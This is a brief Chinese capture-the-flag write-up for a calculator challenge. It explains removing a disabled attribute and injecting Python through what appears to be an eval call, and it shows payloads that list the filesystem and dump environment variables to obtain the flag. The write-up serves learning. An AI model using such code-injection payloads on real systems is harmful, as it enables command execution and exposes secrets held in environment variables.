计算器
修改前端的disable属性, 将其删除, 使得可以更改输入框的内容, 变为可控
输入表达式可以执行计算操作, 大概代码里面是使用了exec或者eval等进行执行, 那么就可以通过构造payload进行rce
不断测试, 可以发现通过这个payload可以rce
__import__('subprocess').getoutput('ls /')
查看环境变量可以拿到flag
__import__('subprocess').getoutput('env')
xss的题目还有待复现, 感觉好难 ><
